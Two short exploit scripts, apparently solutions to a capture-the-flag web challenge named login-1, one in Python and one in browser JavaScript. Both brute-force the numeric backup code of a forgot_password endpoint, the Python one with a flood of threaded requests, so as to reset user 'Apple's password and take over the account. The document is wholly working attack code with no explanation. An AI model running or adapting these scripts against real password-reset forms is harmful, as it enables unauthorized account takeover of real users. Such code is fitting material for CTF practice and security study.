File: sunrinCTF/web/login-1/ex.py
from inspect import Parameter
from re import I
import threading
import requests

URL = 'http://host3.dreamhack.games:18063/forgot_password'

for BACKUPCODE in range(100):
    parameter = {'userid' : 'Apple', 'newpassword' : 'nabomhalang', 'backupCode': BACKUPCODE}
    th = threading.Thread(target=requests.post, args=(URL, parameter))
    th.start()
    

File: sunrinCTF/web/login-1/ex.js
for(var i = 0; i < 0xff; i++) {
    var data = new FormData();
    data.append('userid', 'Apple');
    data.append('newpassword', 'a');
    data.append('backupCode', i);

    var xhr = new XMLHttpRequest();
    xhr.open('POST', '/forgot_password', true);
    xhr.onload = function () {
        if((this.responseText).includes('Success')) {
            console.log("successed");
        } else {
            console.log("ailed");
        }
    };
    xhr.send(data);
};